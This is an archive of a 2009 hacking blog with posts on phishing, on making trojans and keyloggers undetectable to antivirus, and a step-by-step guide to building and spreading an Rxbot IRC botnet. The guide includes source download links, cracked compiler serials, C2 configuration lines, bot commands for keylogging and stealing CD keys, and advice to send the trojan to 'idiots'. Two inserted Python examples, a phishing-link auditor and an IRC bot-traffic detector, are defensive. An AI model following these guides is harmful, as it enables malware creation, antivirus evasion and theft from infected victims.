Monday, March 16, 2009

Simple Hacking: Phishing

In the field of computer security, phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites (YouTube, Facebook, MySpace, Windows Live Messenger), auction sites (eBay), online banks (Wells Fargo, Bank of America, Chase), online payment processors (PayPal), or IT Administrators (Yahoo, ISPs, corporate) are commonly used to lure the unsuspecting. Phishing is typically carried out by e-mail or instant messaging,[1] and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Even when using server authentication, it may require skill to detect that the website is fake. Phishing is an example of social engineering techniques used to fool users,[2] and exploits the poor usability of current web security technologies.[3] Attempts to deal with the growing number of reported phishing incidents include legislation, user training, public awareness, and technical security measures.

Common methods used:

Link manipulation: Most methods of phishing use some form of technical deception designed to make a link in an e-mail (and the spoofed website it leads to) appear to belong to the spoofed organization. Misspelled URLs or the use of subdomains are common tricks used by phishers. In the following example URL, http://www.yourbank.example.com/, it appears as though the URL will take you to the example section of the yourbank website; actually this URL points to the "yourbank" (i.e. phishing) section of the example website. Another common trick is to make the anchor text for the link appear to be valid, when the link actually goes to the phishers' site. The following example link, http://www.google.com/genuine/, appears to take you to an article entitled "Genuine"; clicking on it will in fact take you to the article entitled "Deception".

Filter evasion: Phishers have used images instead of text to make it harder for anti-phishing filters to detect text commonly used in phishing e-mails.

Website forgery: Once a victim visits the phishing website the deception is not over. Some phishing scams use JavaScript commands in order to alter the address bar. This is done either by placing a picture of a legitimate URL over the address bar, or by closing the original address bar and opening a new one with the legitimate URL. An attacker can even use flaws in a trusted website's own scripts against the victim. These types of attacks (known as cross-site scripting) are particularly problematic, because they direct the user to sign in at their bank or service's own web page, where everything from the web address to the security certificates appears correct. In reality, the link to the website is crafted to carry out the attack, although it is very difficult to spot without specialist knowledge. Just such a flaw was used in 2006 against PayPal.
A Universal Man-in-the-middle Phishing Kit, discovered by RSA Security, provides a simple-to-use interface that allows a phisher to convincingly reproduce websites and capture log-in details entered at the fake site.
To avoid anti-phishing techniques that scan websites for phishing-related text, phishers have begun to use Flash-based websites. These look much like the real website, but hide the text in a multimedia object.
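
The two link tricks described under "Link manipulation" (a brand name placed in a subdomain, and anchor text that shows a different URL than the link target) can be checked mechanically by a mail filter. The following is an added example, not part of the original post; `audit`, the brand mapping and the sample links are constructed, and the registrable-domain logic is a naive assumption.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

def host_of(text):
    text = text.strip()
    if not text or " " in text:          # ordinary anchor text, not a URL
        return None
    try:
        host = urlsplit(text if "://" in text else "http://" + text).hostname
    except ValueError:
        return None
    return host if host and "." in host else None

def registrable(host):
    # Assumption: naive "last two labels"; real code should use the Public Suffix List.
    return ".".join(host.split(".")[-2:])

class LinkAudit(HTMLParser):
    def __init__(self, brands):
        super().__init__()
        self.brands, self.href, self.text, self.findings = brands, None, [], []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self.href, self.text = dict(attrs).get("href"), []

    def handle_data(self, data):
        if self.href is not None:
            self.text.append(data)

    def handle_endtag(self, tag):
        if tag != "a" or self.href is None:
            return
        target, shown = host_of(self.href), host_of("".join(self.text))
        if target and shown and registrable(shown) != registrable(target):
            self.findings.append(("text-href-mismatch", shown, target))
        for brand, legit in self.brands.items():
            if target and brand in target.split(".") and registrable(target) != legit:
                self.findings.append(("brand-in-subdomain", brand, target))
        self.href = None

def audit(html, brands):
    parser = LinkAudit(brands)
    parser.feed(html)
    return parser.findings

BRANDS = {"yourbank": "yourbank.example"}  # constructed: brand -> assumed legitimate domain
SAMPLE = ('<a href="http://www.yourbank.example.com/">sign in here</a>'  # constructed links
          '<a href="http://deception.example.net/">http://www.google.com/genuine/</a>'
          '<a href="https://www.yourbank.example/">www.yourbank.example</a>')
```

`audit(SAMPLE, BRANDS)` flags the first two links and leaves the third, whose text and target share the brand's own domain, alone.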

Want to learn how to do simple phishing?
Watch this video: http://www.youtube.com/watch?v=_EajDbwNP4s&feature=related



Friday, March 13, 2009

How to make rBot,trojans,keyloggerz and viruses Undetectable

1. Encryptors/Compressors:You would think this should be the easiest way to UD (Undetect) a Trojan...but alas, it is not. The problem is simply this, most people use the same Trojans and Packers so often that Anti-Virus software knows pretty much all the signatures. They either use Ardamax Keylogger, Optix Pro, Beast, ProRat etc. for Trojans. For Packers they use UPX, PECompress, AsPack, Mophine etc. Again, none of these combinations work because all the signatures have been flagged. The best way this option will work is to find lesser known Packers and Trojans to work with.Try a Google search for Executable Packers. Get a few that you have not heard of before or that have a decent rating. If it is not freeware, I am sure there will be a Crack for it. For Trojans, three good resources are VXChaos, LeetUpload or VX Heaven. Remember to pick the ones that are not well known and try to mix and match those Trojans and Packers.2. Byte Adders:This technique allows you to add junk bytes to your Trojan as to confuse Anti-Virus software. It does this by moving the code around inside the executable as the bytes are being added. This means that the signature will not be in the place the Anti-Virus expects it to be. A good tool for this would be StealthTools v2.0 by Gobo.3. Hex Editing:This is much more complicated and takes a lot more practice to get right. The idea here is to find the signature that Anti-Virus software has flagged inside of your Trojan and change it by adding a different byte, or changing the Offset to one of its other equivalents.The three things you will need here is a File Splitter, Hex Editor and a Anti-Virus Offset Finder. The File Splitter will cut your executable into smaller files (preferably 1 byte per file). You then use your Hex Editor on the file that holds the signature and change that signature. 
Or, you can keep the file complete and use your AV Offset Finder to find the Offsets automatically and just change the signatures found with your Hex Editor.Step One: Place your Trojan Server in a folder.Step Two: Split your Server with your File Splitter into 1 byte per file. This may make a lot of files in your folder (depending on how large the Server is), but it is worth it because you will know that only one or two of those files has the signature that is flagged and all the rest are clean.Step Three: Scan your folder with your Anti-Virus software and make note of which files it says are infected. Those will be the ones you edit.Step Four: Open up each infected file with your Hex Editor and change the Offset. There is no fool proof way of doing this, you will have to experiment. Since this will be a 1 byte file, there will not be much you need to change. Just change one character or byte at a time and then save your progress. Re-scan to see if it worked. If it did not, go back and try again.Step Five: Once you feel that you have found all signatures and changed them, Rejoin your files with your File Splitter and test your Server to see if it works. Remember that too much Editing will make your Server useless so be careful.(Optional) Step Six: Another good way is to use a Anti-Virus Offset Finder that will find the correct Offset automatically so you do not have to search for them or split your Server. Get AV Devil 2.1 to find the Offsets (password is: to0l-base).You have to remember that different AV software use different signatures, so scan with as many as you can.4. Source:The very best way to make an undetectable Trojan has always been to make your own. I know it may seem like a daunting task to do, but it could be simpler then you think. Here I will give a few options on how to do this. The reason why you would want to make your own Trojan is the fact that each time it is compiled, it is given a new signature. 
Changing just a single string in the Source code can make it undetectable.Option 1: Free Trojan Source Code.Finding free Trojan source code is not hard. Again, going to places like VXChaos or Planet Source Code can yield a plethora of really good and lesser known Trojan code. Pick what Programming Language you like and look for examples. Not much needs to be changed to makes these undetectable. A simple recompile will sometimes do the trick.Option 2: Decompiling.Some may call this "Stealing" source code. I like to call it "Borrowing". The first thing you need to know is what language your Trojan is in. Lets say your Trojan was Optix Pro, your programming language would be Delphi. A good Delphi Decompiler would be DeDe. Decompile Optix Pro with DeDe then recompile it with a Delphi compiler and viola! Just change a few strings around within the source and you should have a undetectable Optix Pro.Another way would be to open your Trojan with a Debugger or Disassembler. Copy down the ASM code and then recompile it in a ASM compiler. That maybe a bit more tricky, but the idea is the same. Try to convert the executable into pure ASM as best you can. There are many free Debuggers/Disassemblers, Google for them.

Friday, March 6, 2009

How to build a botnet (revised)


There are many tutorials around but I thought I would post one to help people.In addition to Rxbot 7.6 modded in this tutorial, you can also use another good source. It is rx-asn-2-re-worked v3 is a stable mod of rxbot and it is 100% functional and not crippled. If you want to download it, you can below:Code:http://rapidshare.com/files/206237223/rbot_7.6_source_code.zip.htmlCompiling is the same as it would be with Rxbot 7.6. I prefer this source but it would ultimately be best to compile your own bot/get a private one.Q:What is a botnet?A: A botnet is where you send a trojan to someone and when they open it a "bot" joins your channel on IRC(secretly, they don't know this)Once done the computer is now refered to as a "zombie".Depending on the source you used, the bot can do several things.But once again depending on the source you can :Keylog their computer, take picutes of their screen, turn on their webcam and take pics/movies, harvest cdkeys and game keys or even cracks, passwords, aim screen names, emails, you can also spam, flood, DDoS, ping, packet, yada yada, some have built in md5 crackers, and clone functions to spamm other irc channels and overrun a channel and even perform IRC "Takeovers".Once again depending on the bot it may be able to kill other fellow competeter bots.Or even kill AV/FW apon startup.Add itself to registry.Open sites.Open commands.Cmd,notepad,html,Anything is possible !Theres the infected computers "bots" the attacker, the server, and the victim.Quote:while the term "botnet" can be used to refer to any group of bots, such as IRC bots, the word is generally used to refer to a collection of compromised machines running programs, usually referred to as worms, Trojan horses, or backdoors, under a common command and control infrastructure. A botnet's originator (aka "bot herder") can control the group remotely, usually through a means such as IRC, and usually for nefarious purposes. Individual programs manifest as IRC "bots". 
Often the command and control takes place via an IRC server or a specific channel on a public IRC network. A bot typically runs hidden, and complies with the RFC 1459 (IRC) standard. Generally, the perpetrator of the botnet has compromised a series of systems using various tools (exploits, buffer overflows, as well as others; see also RPC). Newer bots can automatically scan their environment and propagate themselves using vulnerabilities and weak passwords. Generally, the more vulnerabilities a bot can scan and propagate through, the more valuable it becomes to a botnet controller community.Suspects in the case used the Randex worm to establish a 30,000 strong botnet used to carry out "low profile DDoS attacks" and steal the CD keys for games, he explained. "They had a huge weapon and didn't use as much as they could have done," Santorelli told El Reg. "The main damage caused in the case is down to the cost of cleaning up infected PCs."Botnets are being used for Google Adword click fraud, according to security watchers.Now enough with all the quotes. As you can see, you can do anything with a botnet. Anything is possible. This is my bot and tutorial. You can host your bots on irc on a public server but I would recommend a private, password protected server.---------------Ignore anything about using the server editor but this tutorial show how to make the trojan undetectable and spread bots:Code:http://rapidshare.com/files/206234923/packer_installer.exe.htmlHere we go ladies and gentlemenFollow the tutorial:I. Setting up the C++ compilier: (easy)Download Code:http://www.megaupload.com/?d=SUHPYZRXCode:Pass: itzforblitzSerial: 812-22245582. Run setup.exe and install. Remember to input serial3. Download and install the Service Pack 6 (60.8 mb) Code:http://www.microsoft.com/downloads/d...displaylang=enAfter that Download and install:Windows SDK (1.2 mb) Code:http://www.megaupload.com/?d=YH3SS78IPass: itzforblitzII. Configuring the C++ compilier (easy)1. 
Open up Microsoft Visual C++ Compilier 6.02. Go to Tools > Options and Click the "Directories" tab3. Now, browse to these directories and add them to the list: (Click the dotted box to add)Quote:C:\PROGRAM FILES\MICROSOFT PLATFORM SDKC:\PROGRAM FILES\MICROSOFT PLATFORM SDK\BINC:\PROGRAM FILES\MICROSOFT PLATFORM SDK\INCLUDEC:\PROGRAM FILES\MICROSOFRT PLATFORM SDK\LIB4. Now put them in this order: (use up and down arrows)(it does not matter whats below those lines)III. Configuring your bot: (easy)1. Download and unpack:Rxbot 7.6 (212.3 kb) Code:http://rapidshare.com/files/21854222...7.6rx.rar.html2. You should see an Rxbot 7.6 folder3. Open the Rxbot 7.6 > configs.h folder and edit these lines only:Quote:Put in quotations:char password[] = "Bot_login_pass"; // bot password (Ex: monkey)char server[] = "aenigma.gotd.org"; // server (Ex: irc.efnet.net)char serverpass[] = ""; // server password (not usually needed)char channel[] = "#botz_channel"; // channel that the bot should joinchar chanpass[] = "My_channel_pass"; // channel passwordOptional:char server2[] = ""; // backup serverchar channel2[] = ""; // backup channelchar chanpass2[] = ""; //Backup channel passIV. Building your bot: (very easy)1. Make sure Microsoft Visual C++ is open2. Select "File > Open Workspace"3. Browse to your Rxbot 7.6 folder and open the rBot.dsw file4. Right Click "rBot Files" and click Build:5. rBot.exe will be in the Rxbot 7.6 > Debug folder !!!YOUR DONE !!!! Now get the rbot and pack it (Use tool in third post and open rbot and click "Protect" and send it to some idiots, Follow tutorial on top to learn how to spread. Some good ways are: Torrents, AIM, Friends, Myspace, School computers, and P2P but there are more ways. 
ENJOY !Command listDownload Command list Code:http://rapidshare.com/files/21542921/cmands.htmlBasics:.login botpassword will login bots.logout will logout bots.keylog on will turn keylogger on.getcdkeys will retrieve cdkeys.Read command list for moreDownload mIRCCode:http://dw.com.com/redir?edId=3&siteI...part%3Ddl-mIRCHow to secure your bots:Don't be an arse it is easy to steal bots. All you need is the irc server address and maybe a key.To steal bots, watch for the @login key one must upload their bot to a direct link (tdotnetwork is execellent)and update the channel topic and run:Quote:@update Code:http://www.mybot.com/download/SMSPRO.exe82The Code:http://mybot.comis your bot's download link and the 82 can be any number(s)Now steal their bots and have them join your channelTo find the server address you need their botnet. Then take their bot and open it in the server editor. Address will be shown and so will password and other needed information.To secure your self:It is fairly easy to secure your bots, here is how:1. When you are in your right click on your chat window and select "Channel Modes"2. Make sure these options are checked:This way no one besides you or another op can set the channel topicNote: Setting "Moderated" is good for when you are not there because anyone who is not voiced (+v) or and op (+o) cannot talk. They will still log in and follow commands however there will be no output.
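
From the defender's side, the cleartext IRC control channel this post describes is visible at a network sensor. The following added example (not part of the original post) parses RFC 1459 lines and flags PRIVMSG/TOPIC text that starts with the command prefixes and verbs quoted above; the captured lines, nicks, hosts and channel name are constructed.

```python
import re

# Verbs and "." / "@" prefixes as quoted in the command list on this page.
BOT_VERBS = {"login", "logout", "keylog", "getcdkeys", "update"}
CONTROL = re.compile(r"^[.@](\w+)")

def parse_irc(line):
    """Split one RFC 1459 message into (prefix, command, params, trailing)."""
    line = line.rstrip("\r\n")
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    head, sep, trailing = line.partition(" :")
    parts = head.split()
    command = parts[0].upper() if parts else ""
    return prefix, command, parts[1:], trailing if sep else None

def detect(lines):
    """Return (line_no, channel, sender, verb) for messages that look like bot control."""
    hits = []
    for no, line in enumerate(lines, 1):
        prefix, command, params, trailing = parse_irc(line)
        # 332 is RPL_TOPIC: the topic a client receives when it joins a channel.
        if command not in ("PRIVMSG", "TOPIC", "332") or not trailing:
            continue
        m = CONTROL.match(trailing)
        if m and m.group(1).lower() in BOT_VERBS:
            channel = next((p for p in params if p.startswith("#")),
                           params[0] if params else "")
            sender = (prefix or "").split("!")[0]
            hits.append((no, channel, sender, m.group(1).lower()))
    return hits

# Constructed capture: control traffic mixed with ordinary chat that must not match.
CAPTURE = [
    ":irc.example.net 332 bot-nick #c2-sample :@update http://files.example.net/build.exe 82",
    ":herder!u@host.example PRIVMSG #c2-sample :.login <redacted>",
    ":herder!u@host.example PRIVMSG #c2-sample :.keylog on",
    ":alice!a@host.example PRIVMSG #linux :see section 3.login for details",
    ":bob!b@host.example PRIVMSG #linux :.profile is read at login",
    ":herder!u@host.example PRIVMSG #c2-sample :.getcdkeys",
]
```

This only works on unencrypted IRC; it is a starting point for a sensor rule, to be paired with host-based detection.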

Sunday, March 1, 2009

Welcome to my blog

I'm a novice in blogging. Please excuse me for any unnecessary mistakes that I will be making in the future.